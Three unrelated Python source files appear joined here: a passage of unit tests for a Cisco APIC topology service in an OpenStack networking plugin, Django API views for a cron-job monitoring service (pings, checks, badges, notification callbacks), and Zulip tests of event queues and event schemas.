def setUp(self):
super(TestCiscoApicTopologyService, self).setUp()
mocked.ControllerMixin.set_up_mocks(self)
mocked.ConfigMixin.set_up_mocks(self)
# Patch notifier
notifier_c = mock.patch(NOTIFIER).start()
self.notifier = mock.Mock()
notifier_c.return_value = self.notifier
# Patch Connection
connection_c = mock.patch(RPC_CONNECTION).start()
self.connection = mock.Mock()
connection_c.return_value = self.connection
# Patch agents db
self.agents_db = mock.patch(AGENTS_DB).start()
self.service = apic_topology.ApicTopologyService()
self.service.apic_manager = mock.Mock()
def test_init_host(self):
self.service.init_host()
self.connection.create_consumer.ensure_called_once()
self.connection.consume_in_threads.ensure_called_once()
def test_update_link_add_nopeers(self):
self.service.peers = {}
args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
self.service.update_link(None, *args)
self.service.apic_manager.add_hostlink.assert_called_once_with(*args)
self.assertEqual(args,
self.service.peers[(mocked.SERVICE_HOST,
mocked.SERVICE_HOST_IFACE)])
def test_update_link_add_with_peers_diff(self):
args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
args_prime = args[:2] + tuple(x + '1' for x in args[2:])
self.service.peers = {args_prime[:2]: args_prime}
self.service.update_link(None, *args)
self.service.apic_manager.remove_hostlink.assert_called_once_with(
*args_prime)
self.service.apic_manager.add_hostlink.assert_called_once_with(*args)
self.assertEqual(
args, self.service.peers[
(mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE)])
def test_update_link_add_with_peers_eq(self):
args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC,
mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
self.service.peers = {args[:2]: args}
self.service.update_link(None, *args)
def test_update_link_rem_with_peers(self):
args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC, 0,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
self.service.peers = {args[:2]: args}
self.service.update_link(None, *args)
self.service.apic_manager.remove_hostlink.assert_called_once_with(
*args)
self.assertFalse(bool(self.service.peers))
def test_update_link_rem_no_peers(self):
args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC, 0,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
self.service.update_link(None, *args)
class TestCiscoApicTopologyAgent(base.BaseTestCase,
mocked.ControllerMixin,
mocked.ConfigMixin):
def setUp(self):
super(TestCiscoApicTopologyAgent, self).setUp()
mocked.ControllerMixin.set_up_mocks(self)
mocked.ConfigMixin.set_up_mocks(self)
# Patch notifier
notifier_c = mock.patch(NOTIFIER).start()
self.notifier = mock.Mock()
notifier_c.return_value = self.notifier
# Patch device_exists
self.dev_exists = mock.patch(DEV_EXISTS).start()
# Patch IPDevice
ipdev_c = mock.patch(IP_DEVICE).start()
self.ipdev = mock.Mock()
ipdev_c.return_value = self.ipdev
self.ipdev.link.address = mocked.SERVICE_HOST_MAC
# Patch execute
self.execute = mock.patch(EXECUTE).start()
self.execute.return_value = LLDPCTL_RES
# Patch tasks
self.periodic_task = mock.patch(PERIODIC_TASK).start()
self.agent = apic_topology.ApicTopologyAgent()
self.agent.host = mocked.SERVICE_HOST
self.agent.service_agent = mock.Mock()
self.agent.lldpcmd = LLDP_CMD
def test_init_host_device_exists(self):
self.agent.lldpcmd = None
self.dev_exists.return_value = True
self.agent.init_host()
self.assertEqual(LLDP_CMD + mocked.APIC_UPLINK_PORTS,
self.agent.lldpcmd)
def test_init_host_device_not_exist(self):
self.agent.lldpcmd = None
self.dev_exists.return_value = False
self.agent.init_host()
self.assertEqual(LLDP_CMD, self.agent.lldpcmd)
def test_get_peers(self):
self.agent.peers = {}
peers = self.agent._get_peers()
expected = [(mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)]
self.assertEqual(expected,
peers[mocked.SERVICE_HOST_IFACE])
def test_check_for_new_peers_no_peers(self):
self.agent.peers = {}
expected = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
peers = {mocked.SERVICE_HOST_IFACE: [expected]}
context = mock.Mock()
with mock.patch.object(self.agent, '_get_peers',
return_value=peers):
self.agent._check_for_new_peers(context)
self.assertEqual(expected,
self.agent.peers[mocked.SERVICE_HOST_IFACE])
self.agent.service_agent.update_link.assert_called_once_with(
context, *expected)
def test_check_for_new_peers_with_peers(self):
expected = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
peers = {mocked.SERVICE_HOST_IFACE: [expected]}
self.agent.peers = {mocked.SERVICE_HOST_IFACE:
[tuple(x + '1' for x in expected)]}
context = mock.Mock()
with mock.patch.object(self.agent, '_get_peers',
return_value=peers):
self.agent._check_for_new_peers(context)
self.agent.service_agent.update_link.assert_called_with(
context, *expected)
| |
from datetime import timedelta as td
import time
from django.conf import settings
from django.db import connection
from django.http import (
HttpResponse,
HttpResponseForbidden,
HttpResponseNotFound,
HttpResponseBadRequest,
JsonResponse,
)
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from hc.accounts.models import Profile
from hc.api import schemas
from hc.api.decorators import authorize, authorize_read, cors, validate_json
from hc.api.forms import FlipsFiltersForm
from hc.api.models import MAX_DELTA, Flip, Channel, Check, Notification, Ping
from hc.lib.badges import check_signature, get_badge_svg, get_badge_url
class BadChannelException(Exception):
def __init__(self, message):
self.message = message
@csrf_exempt
@never_cache
def ping(request, code, check=None, action="success", exitstatus=None):
if check is None:
try:
check = Check.objects.get(code=code)
except Check.DoesNotExist:
return HttpResponseNotFound("not found")
if exitstatus is not None and exitstatus > 255:
return HttpResponseBadRequest("invalid url format")
headers = request.META
remote_addr = headers.get("HTTP_X_FORWARDED_FOR", headers["REMOTE_ADDR"])
remote_addr = remote_addr.split(",")[0]
scheme = headers.get("HTTP_X_FORWARDED_PROTO", "http")
method = headers["REQUEST_METHOD"]
ua = headers.get("HTTP_USER_AGENT", "")
body = request.body.decode(errors="replace")
if exitstatus is not None and exitstatus > 0:
action = "fail"
if check.methods == "POST" and method != "POST":
action = "ign"
check.ping(remote_addr, scheme, method, ua, body, action, exitstatus)
response = HttpResponse("OK")
response["Access-Control-Allow-Origin"] = "*"
return response
@csrf_exempt
def ping_by_slug(request, ping_key, slug, action="success", exitstatus=None):
try:
check = Check.objects.get(slug=slug, project__ping_key=ping_key)
except Check.DoesNotExist:
return HttpResponseNotFound("not found")
except Check.MultipleObjectsReturned:
return HttpResponse("ambiguous slug", status=409)
return ping(request, check.code, check, action, exitstatus)
def _lookup(project, spec):
unique_fields = spec.get("unique", [])
if unique_fields:
existing_checks = Check.objects.filter(project=project)
if "name" in unique_fields:
existing_checks = existing_checks.filter(name=spec.get("name"))
if "tags" in unique_fields:
existing_checks = existing_checks.filter(tags=spec.get("tags"))
if "timeout" in unique_fields:
timeout = td(seconds=spec["timeout"])
existing_checks = existing_checks.filter(timeout=timeout)
if "grace" in unique_fields:
grace = td(seconds=spec["grace"])
existing_checks = existing_checks.filter(grace=grace)
return existing_checks.first()
def _update(check, spec):
# First, validate the supplied channel codes/names
if "channels" not in spec:
# If the channels key is not present, don't update check's channels
new_channels = None
elif spec["channels"] == "*":
# "*" means "all project's channels"
new_channels = Channel.objects.filter(project=check.project)
elif spec.get("channels") == "":
# "" means "empty list"
new_channels = []
else:
# expect a comma-separated list of channel codes or names
new_channels = set()
available = list(Channel.objects.filter(project=check.project))
for s in spec["channels"].split(","):
if s == "":
raise BadChannelException("empty channel identifier")
matches = [c for c in available if str(c.code) == s or c.name == s]
if len(matches) == 0:
raise BadChannelException("invalid channel identifier: %s" % s)
elif len(matches) > 1:
raise BadChannelException("non-unique channel identifier: %s" % s)
new_channels.add(matches[0])
need_save = False
if check.pk is None:
# Empty pk means we're inserting a new check,
# and so do need to save() it:
need_save = True
if "name" in spec and check.name != spec["name"]:
check.set_name_slug(spec["name"])
need_save = True
if "tags" in spec and check.tags != spec["tags"]:
check.tags = spec["tags"]
need_save = True
if "desc" in spec and check.desc != spec["desc"]:
check.desc = spec["desc"]
need_save = True
if "manual_resume" in spec and check.manual_resume != spec["manual_resume"]:
check.manual_resume = spec["manual_resume"]
need_save = True
if "methods" in spec and check.methods != spec["methods"]:
check.methods = spec["methods"]
need_save = True
if "timeout" in spec and "schedule" not in spec:
new_timeout = td(seconds=spec["timeout"])
if check.kind != "simple" or check.timeout != new_timeout:
check.kind = "simple"
check.timeout = new_timeout
need_save = True
if "grace" in spec:
new_grace = td(seconds=spec["grace"])
if check.grace != new_grace:
check.grace = new_grace
need_save = True
if "schedule" in spec:
if check.kind != "cron" or check.schedule != spec["schedule"]:
check.kind = "cron"
check.schedule = spec["schedule"]
need_save = True
if "tz" in spec and check.tz != spec["tz"]:
check.tz = spec["tz"]
need_save = True
if need_save:
check.alert_after = check.going_down_after()
check.save()
# This needs to be done after saving the check, because of
# the M2M relation between checks and channels:
if new_channels is not None:
check.channel_set.set(new_channels)
@authorize_read
def get_checks(request):
q = Check.objects.filter(project=request.project)
if not request.readonly:
q = q.prefetch_related("channel_set")
tags = set(request.GET.getlist("tag"))
for tag in tags:
# approximate filtering by tags
q = q.filter(tags__contains=tag)
checks = []
for check in q:
# precise, final filtering
if not tags or check.matches_tag_set(tags):
checks.append(check.to_dict(readonly=request.readonly))
return JsonResponse({"checks": checks})
@validate_json(schemas.check)
@authorize
def create_check(request):
created = False
check = _lookup(request.project, request.json)
if check is None:
if request.project.num_checks_available() <= 0:
return HttpResponseForbidden()
check = Check(project=request.project)
created = True
try:
_update(check, request.json)
except BadChannelException as e:
return JsonResponse({"error": e.message}, status=400)
return JsonResponse(check.to_dict(), status=201 if created else 200)
@csrf_exempt
@cors("GET", "POST")
def checks(request):
if request.method == "POST":
return create_check(request)
return get_checks(request)
@cors("GET")
@csrf_exempt
@authorize
def channels(request):
q = Channel.objects.filter(project=request.project)
channels = [ch.to_dict() for ch in q]
return JsonResponse({"channels": channels})
@authorize_read
def get_check(request, code):
check = get_object_or_404(Check, code=code)
if check.project_id != request.project.id:
return HttpResponseForbidden()
return JsonResponse(check.to_dict(readonly=request.readonly))
@cors("GET")
@csrf_exempt
@authorize_read
def get_check_by_unique_key(request, unique_key):
checks = Check.objects.filter(project=request.project.id)
for check in checks:
if check.unique_key == unique_key:
return JsonResponse(check.to_dict(readonly=request.readonly))
return HttpResponseNotFound()
@validate_json(schemas.check)
@authorize
def update_check(request, code):
check = get_object_or_404(Check, code=code)
if check.project_id != request.project.id:
return HttpResponseForbidden()
try:
_update(check, request.json)
except BadChannelException as e:
return JsonResponse({"error": e.message}, status=400)
return JsonResponse(check.to_dict())
@authorize
def delete_check(request, code):
check = get_object_or_404(Check, code=code)
if check.project_id != request.project.id:
return HttpResponseForbidden()
response = check.to_dict()
check.delete()
return JsonResponse(response)
@csrf_exempt
@cors("POST", "DELETE", "GET")
def single(request, code):
if request.method == "POST":
return update_check(request, code)
if request.method == "DELETE":
return delete_check(request, code)
return get_check(request, code)
@cors("POST")
@csrf_exempt
@validate_json()
@authorize
def pause(request, code):
check = get_object_or_404(Check, code=code)
if check.project_id != request.project.id:
return HttpResponseForbidden()
check.status = "paused"
check.last_start = None
check.alert_after = None
check.save()
# After pausing a check we must check if all checks are up,
# and Profile.next_nag_date needs to be cleared out:
check.project.update_next_nag_dates()
return JsonResponse(check.to_dict())
@cors("GET")
@csrf_exempt
@validate_json()
@authorize
def pings(request, code):
check = get_object_or_404(Check, code=code)
if check.project_id != request.project.id:
return HttpResponseForbidden()
# Look up ping log limit from account's profile.
# There might be more pings in the database (depends on how pruning is handled)
# but we will not return more than the limit allows.
profile = Profile.objects.get(user__project=request.project)
limit = profile.ping_log_limit
# Query in descending order so we're sure to get the most recent
# pings, regardless of the limit restriction
pings = Ping.objects.filter(owner=check).order_by("-id")[:limit]
# Ascending order is more convenient for calculating duration, so use reverse()
prev, dicts = None, []
for ping in reversed(pings):
d = ping.to_dict()
if ping.kind != "start" and prev and prev.kind == "start":
delta = ping.created - prev.created
if delta < MAX_DELTA:
d["duration"] = delta.total_seconds()
dicts.insert(0, d)
prev = ping
return JsonResponse({"pings": dicts})
def flips(request, check):
if check.project_id != request.project.id:
return HttpResponseForbidden()
form = FlipsFiltersForm(request.GET)
if not form.is_valid():
return HttpResponseBadRequest()
flips = Flip.objects.filter(owner=check).order_by("-id")
if form.cleaned_data["start"]:
flips = flips.filter(created__gte=form.cleaned_data["start"])
if form.cleaned_data["end"]:
flips = flips.filter(created__lt=form.cleaned_data["end"])
if form.cleaned_data["seconds"]:
threshold = timezone.now() - td(seconds=form.cleaned_data["seconds"])
flips = flips.filter(created__gte=threshold)
return JsonResponse({"flips": [flip.to_dict() for flip in flips]})
@cors("GET")
@csrf_exempt
@authorize_read
def flips_by_uuid(request, code):
check = get_object_or_404(Check, code=code)
return flips(request, check)
@cors("GET")
@csrf_exempt
@authorize_read
def flips_by_unique_key(request, unique_key):
checks = Check.objects.filter(project=request.project.id)
for check in checks:
if check.unique_key == unique_key:
return flips(request, check)
return HttpResponseNotFound()
@cors("GET")
@csrf_exempt
@authorize_read
def badges(request):
tags = set(["*"])
for check in Check.objects.filter(project=request.project):
tags.update(check.tags_list())
key = request.project.badge_key
badges = {}
for tag in tags:
badges[tag] = {
"svg": get_badge_url(key, tag),
"svg3": get_badge_url(key, tag, with_late=True),
"json": get_badge_url(key, tag, fmt="json"),
"json3": get_badge_url(key, tag, fmt="json", with_late=True),
"shields": get_badge_url(key, tag, fmt="shields"),
"shields3": get_badge_url(key, tag, fmt="shields", with_late=True),
}
return JsonResponse({"badges": badges})
@never_cache
@cors("GET")
def badge(request, badge_key, signature, tag, fmt):
if fmt not in ("svg", "json", "shields"):
return HttpResponseNotFound()
with_late = True
if len(signature) == 10 and signature.endswith("-2"):
with_late = False
if not check_signature(badge_key, tag, signature):
return HttpResponseNotFound()
q = Check.objects.filter(project__badge_key=badge_key)
if tag != "*":
q = q.filter(tags__contains=tag)
label = tag
else:
label = settings.MASTER_BADGE_LABEL
status, total, grace, down = "up", 0, 0, 0
for check in q:
if tag != "*" and tag not in check.tags_list():
continue
total += 1
check_status = check.get_status()
if check_status == "down":
down += 1
status = "down"
if fmt == "svg":
# For SVG badges, we can leave the loop as soon as we
# find the first "down"
break
elif check_status == "grace":
grace += 1
if status == "up" and with_late:
status = "late"
if fmt == "shields":
color = "success"
if status == "down":
color = "critical"
elif status == "late":
color = "important"
return JsonResponse(
{"schemaVersion": 1, "label": label, "message": status, "color": color}
)
if fmt == "json":
return JsonResponse(
{"status": status, "total": total, "grace": grace, "down": down}
)
svg = get_badge_svg(label, status)
return HttpResponse(svg, content_type="image/svg+xml")
@csrf_exempt
@require_POST
def notification_status(request, code):
""" Handle notification delivery status callbacks. """
try:
cutoff = timezone.now() - td(hours=1)
notification = Notification.objects.get(code=code, created__gt=cutoff)
except Notification.DoesNotExist:
# If the notification does not exist, or is more than a hour old,
# return HTTP 200 so the other party doesn't retry over and over again:
return HttpResponse()
error, mark_disabled = None, False
# Look for "error" and "mark_disabled" keys:
if request.POST.get("error"):
error = request.POST["error"][:200]
mark_disabled = request.POST.get("mark_disabled")
# Handle "MessageStatus" key from Twilio
if request.POST.get("MessageStatus") in ("failed", "undelivered"):
status = request.POST["MessageStatus"]
error = f"Delivery failed (status={status})."
# Handle "CallStatus" key from Twilio
if request.POST.get("CallStatus") == "failed":
error = f"Delivery failed (status=failed)."
if error:
notification.error = error
notification.save(update_fields=["error"])
channel_q = Channel.objects.filter(id=notification.channel_id)
channel_q.update(last_error=error)
if mark_disabled:
channel_q.update(disabled=True)
return HttpResponse()
def metrics(request):
if not settings.METRICS_KEY:
return HttpResponseForbidden()
key = request.META.get("HTTP_X_METRICS_KEY")
if key != settings.METRICS_KEY:
return HttpResponseForbidden()
doc = {
"ts": int(time.time()),
"max_ping_id": Ping.objects.values_list("id", flat=True).last(),
"max_notification_id": Notification.objects.values_list("id", flat=True).last(),
"num_unprocessed_flips": Flip.objects.filter(processed__isnull=True).count(),
}
return JsonResponse(doc)
def status(request):
with connection.cursor() as c:
c.execute("SELECT 1")
c.fetchone()
return HttpResponse("OK")
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from typing import Any, Callable, Optional
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from django.test import TestCase
from zerver.models import (
get_client, get_realm, get_stream, get_user_profile_by_email,
Message, RealmAlias, Recipient, UserProfile
)
from zerver.lib.actions import (
apply_events,
bulk_remove_subscriptions,
do_add_alert_words,
check_add_realm_emoji,
do_add_realm_filter,
do_change_avatar_source,
do_change_default_all_public_streams,
do_change_default_events_register_stream,
do_change_default_sending_stream,
do_change_full_name,
do_change_is_admin,
do_change_stream_description,
do_change_subscription_property,
do_create_user,
do_deactivate_stream,
do_deactivate_user,
do_regenerate_api_key,
do_remove_alert_words,
do_remove_realm_emoji,
do_remove_realm_filter,
do_rename_stream,
do_add_default_stream,
do_set_muted_topics,
do_set_realm_create_stream_by_admins_only,
do_set_realm_name,
do_set_realm_restricted_to_domain,
do_set_realm_invite_required,
do_set_realm_invite_by_admins_only,
do_set_realm_message_editing,
do_set_realm_default_language,
do_set_realm_authentication_methods,
do_update_message,
do_update_pointer,
do_change_twenty_four_hour_time,
do_change_left_side_userlist,
do_change_enable_stream_desktop_notifications,
do_change_enable_stream_sounds,
do_change_enable_desktop_notifications,
do_change_enable_sounds,
do_change_enable_offline_email_notifications,
do_change_enable_offline_push_notifications,
do_change_enable_online_push_notifications,
do_change_pm_content_in_desktop_notifications,
do_change_enable_digest_emails,
do_add_realm_alias,
do_remove_realm_alias,
fetch_initial_state_data,
get_subscription
)
from zerver.lib.message import render_markdown
from zerver.lib.test_helpers import POSTRequestMock
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.validator import (
check_bool, check_dict, check_int, check_list, check_string,
equals, check_none_or, Validator
)
from zerver.views.events_register import _default_all_public_streams, _default_narrow
from zerver.tornado.event_queue import allocate_client_descriptor, EventQueue
from zerver.tornado.views import get_events_backend
from collections import OrderedDict
import mock
import time
import ujson
from six.moves import range
class TornadoTest(ZulipTestCase):
def test_tornado_endpoint(self):
# type: () -> None
# This test is mostly intended to get minimal coverage on
# the /notify_tornado endpoint, so we can have 100% URL coverage,
# but it does exercise a little bit of the codepath.
post_data = dict(
data=ujson.dumps(
dict(
event=dict(
type='other'
),
users=[get_user_profile_by_email('hamlet@zulip.com').id],
),
),
)
req = POSTRequestMock(post_data, user_profile=None)
req.META['REMOTE_ADDR'] = '127.0.0.1'
result = self.client_post_request('/notify_tornado', req)
self.assert_json_error(result, 'Access denied', status_code=403)
post_data['secret'] = settings.SHARED_SECRET
req = POSTRequestMock(post_data, user_profile=None)
req.META['REMOTE_ADDR'] = '127.0.0.1'
result = self.client_post_request('/notify_tornado', req)
self.assert_json_success(result)
class GetEventsTest(ZulipTestCase):
def tornado_call(self, view_func, user_profile, post_data):
# type: (Callable[[HttpRequest, UserProfile], HttpResponse], UserProfile, Dict[str, Any]) -> HttpResponse
request = POSTRequestMock(post_data, user_profile)
return view_func(request, user_profile)
def test_get_events(self):
# type: () -> None
email = "hamlet@zulip.com"
recipient_email = "othello@zulip.com"
user_profile = get_user_profile_by_email(email)
recipient_user_profile = get_user_profile_by_email(recipient_email)
self.login(email)
result = self.tornado_call(get_events_backend, user_profile,
{"apply_markdown": ujson.dumps(True),
"event_types": ujson.dumps(["message"]),
"user_client": "website",
"dont_block": ujson.dumps(True),
})
self.assert_json_success(result)
queue_id = ujson.loads(result.content)["queue_id"]
recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
{"apply_markdown": ujson.dumps(True),
"event_types": ujson.dumps(["message"]),
"user_client": "website",
"dont_block": ujson.dumps(True),
})
self.assert_json_success(recipient_result)
recipient_queue_id = ujson.loads(recipient_result.content)["queue_id"]
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 0)
local_id = 10.01
self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 1)
self.assertEqual(events[0]["type"], "message")
self.assertEqual(events[0]["message"]["sender_email"], email)
self.assertEqual(events[0]["local_message_id"], local_id)
self.assertEqual(events[0]["message"]["display_recipient"][0]["is_mirror_dummy"], False)
self.assertEqual(events[0]["message"]["display_recipient"][1]["is_mirror_dummy"], False)
last_event_id = events[0]["id"]
local_id += 0.01
self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": last_event_id,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 1)
self.assertEqual(events[0]["type"], "message")
self.assertEqual(events[0]["message"]["sender_email"], email)
self.assertEqual(events[0]["local_message_id"], local_id)
# Test that the received message in the receiver's event queue
# exists and does not contain a local id
recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
{"queue_id": recipient_queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
recipient_events = ujson.loads(recipient_result.content)["events"]
self.assert_json_success(recipient_result)
self.assertEqual(len(recipient_events), 2)
self.assertEqual(recipient_events[0]["type"], "message")
self.assertEqual(recipient_events[0]["message"]["sender_email"], email)
self.assertTrue("local_message_id" not in recipient_events[0])
self.assertEqual(recipient_events[1]["type"], "message")
self.assertEqual(recipient_events[1]["message"]["sender_email"], email)
self.assertTrue("local_message_id" not in recipient_events[1])
def test_get_events_narrow(self):
# type: () -> None
email = "hamlet@zulip.com"
user_profile = get_user_profile_by_email(email)
self.login(email)
result = self.tornado_call(get_events_backend, user_profile,
{"apply_markdown": ujson.dumps(True),
"event_types": ujson.dumps(["message"]),
"narrow": ujson.dumps([["stream", "denmark"]]),
"user_client": "website",
"dont_block": ujson.dumps(True),
})
self.assert_json_success(result)
queue_id = ujson.loads(result.content)["queue_id"]
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 0)
self.send_message(email, "othello@zulip.com", Recipient.PERSONAL, "hello")
self.send_message(email, "Denmark", Recipient.STREAM, "hello")
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 1)
self.assertEqual(events[0]["type"], "message")
self.assertEqual(events[0]["message"]["display_recipient"], "Denmark")
class EventsRegisterTest(ZulipTestCase):
user_profile = get_user_profile_by_email("hamlet@zulip.com")
bot = get_user_profile_by_email("welcome-bot@zulip.com")
maxDiff = None # type: Optional[int]
def create_bot(self, email):
# type: (str) -> UserProfile
return do_create_user(email, '123',
get_realm('zulip'), 'Test Bot', 'test',
bot_type=UserProfile.DEFAULT_BOT, bot_owner=self.user_profile)
def realm_bot_schema(self, field_name, check):
# type: (str, Validator) -> Validator
return check_dict([
('type', equals('realm_bot')),
('op', equals('update')),
('bot', check_dict([
('email', check_string),
('user_id', check_int),
(field_name, check),
])),
])
def do_test(self, action, event_types=None):
# type: (Callable[[], Any], Optional[List[str]]) -> List[Dict[str, Any]]
client = allocate_client_descriptor(
dict(user_profile_id = self.user_profile.id,
user_profile_email = self.user_profile.email,
realm_id = self.user_profile.realm_id,
event_types = event_types,
client_type_name = "website",
apply_markdown = True,
all_public_streams = False,
queue_timeout = 600,
last_connection_time = time.time(),
narrow = [])
)
# hybrid_state = initial fetch state + re-applying events triggered by our action
# normal_state = do action then fetch at the end (the "normal" code path)
hybrid_state = fetch_initial_state_data(self.user_profile, event_types, "")
action()
events = client.event_queue.contents()
self.assertTrue(len(events) > 0)
apply_events(hybrid_state, events, self.user_profile)
normal_state = fetch_initial_state_data(self.user_profile, event_types, "")
self.match_states(hybrid_state, normal_state)
return events
def assert_on_error(self, error):
# type: (str) -> None
if error:
raise AssertionError(error)
def match_states(self, state1, state2):
# type: (Dict[str, Any], Dict[str, Any]) -> None
def normalize(state):
# type: (Dict[str, Any]) -> None
state['realm_users'] = {u['email']: u for u in state['realm_users']}
for u in state['subscriptions']:
u['subscribers'].sort()
state['subscriptions'] = {u['name']: u for u in state['subscriptions']}
state['unsubscribed'] = {u['name']: u for u in state['unsubscribed']}
if 'realm_bots' in state:
state['realm_bots'] = {u['email']: u for u in state['realm_bots']}
normalize(state1)
normalize(state2)
self.assertEqual(state1, state2)
def test_send_message_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('message')),
('flags', check_list(None)),
('message', check_dict([
('avatar_url', check_string),
('client', check_string),
('content', check_string),
('content_type', equals('text/html')),
('display_recipient', check_string),
('gravatar_hash', check_string),
('id', check_int),
('recipient_id', check_int),
('sender_domain', check_string),
('sender_email', check_string),
('sender_full_name', check_string),
('sender_id', check_int),
('sender_short_name', check_string),
('subject', check_string),
('subject_links', check_list(None)),
('timestamp', check_int),
('type', check_string),
])),
])
events = self.do_test(lambda: self.send_message("hamlet@zulip.com", "Verona", Recipient.STREAM, "hello"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
schema_checker = check_dict([
('type', equals('update_message')),
('flags', check_list(None)),
('content', check_string),
('edit_timestamp', check_int),
('flags', check_list(None)),
('message_id', check_int),
('message_ids', check_list(check_int)),
('orig_content', check_string),
('orig_rendered_content', check_string),
('orig_subject', check_string),
('propagate_mode', check_string),
('rendered_content', check_string),
('sender', check_string),
('stream_id', check_int),
('subject', check_string),
('subject_links', check_list(None)),
# There is also a timestamp field in the event, but we ignore it, as
# it's kind of an unwanted but harmless side effect of calling log_event.
])
message = Message.objects.order_by('-id')[0]
topic = 'new_topic'
propagate_mode = 'change_all'
content = 'new content'
rendered_content = render_markdown(message, content)
events = self.do_test(lambda: do_update_message(self.user_profile, message, topic, propagate_mode, content, rendered_content))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_pointer_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('pointer')),
('pointer', check_int)
])
events = self.do_test(lambda: do_update_pointer(self.user_profile, 1500))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_register_events(self):
# type: () -> None
realm_user_add_checker = check_dict([
('type', equals('realm_user')),
('op', equals('add')),
('person', check_dict([
('email', check_string),
('full_name', check_string),
('is_admin', check_bool),
('is_bot', check_bool),
])),
])
stream_create_checker = check_dict([
('type', equals('stream')),
('op', equals('create')),
('streams', check_list(check_dict([
('description', check_string),
('invite_only', check_bool),
('name', check_string),
('stream_id', check_int),
])))
])
events = self.do_test(lambda: self.register("test1@zulip.com", "test1"))
error = realm_user_add_checker('events[0]', events[0])
self.assert_on_error(error)
error = stream_create_checker('events[1]', events[1])
self.assert_on_error(error)
def test_alert_words_events(self):
# type: () -> None
alert_words_checker = check_dict([
('type', equals('alert_words')),
('alert_words', check_list(check_string)),
])
events = self.do_test(lambda: do_add_alert_words(self.user_profile, ["alert_word"]))
error = alert_words_checker('events[0]', events[0])
self.assert_on_error(error)
events = self.do_test(lambda: do_remove_alert_words(self.user_profile, ["alert_word"]))
error = alert_words_checker('events[0]', events[0])
self.assert_on_error(error)
def test_default_streams_events(self):
# type: () -> None
default_streams_checker = check_dict([
('type', equals('default_streams')),
('default_streams', check_list(check_dict([
('description', check_string),
('invite_only', check_bool),
('name', check_string),
('stream_id', check_int),
]))),
])
events = self.do_test(lambda: do_add_default_stream(self.user_profile.realm, "Scotland"))
error = default_streams_checker('events[0]', events[0])
self.assert_on_error(error)
def test_muted_topics_events(self):
# type: () -> None
muted_topics_checker = check_dict([
('type', equals('muted_topics')),
('muted_topics', check_list(check_list(check_string, 2))),
])
events = self.do_test(lambda: do_set_muted_topics(self.user_profile, [[u"Denmark", u"topic"]]))
error = muted_topics_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_full_name(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_user')),
('op', equals('update')),
('person', check_dict([
('email', check_string),
('full_name', check_string),
])),
])
events = self.do_test(lambda: do_change_full_name(self.user_profile, 'Sir Hamlet'))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_name(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('name')),
('value', check_string),
])
